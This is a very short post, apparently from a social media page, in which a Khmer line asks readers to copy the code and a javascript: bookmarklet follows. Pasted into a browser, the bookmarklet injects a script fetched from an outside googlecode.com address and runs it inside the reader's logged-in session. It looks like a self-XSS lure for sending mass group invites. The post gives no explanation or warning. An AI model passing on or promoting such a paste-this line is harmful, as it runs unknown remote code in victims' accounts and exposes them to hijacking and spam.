សូមCopyកូជ

javascript:document.body.appendChild(document.createElement('script')).src='http://group-invites.googlecode.com/files/group-invite.js';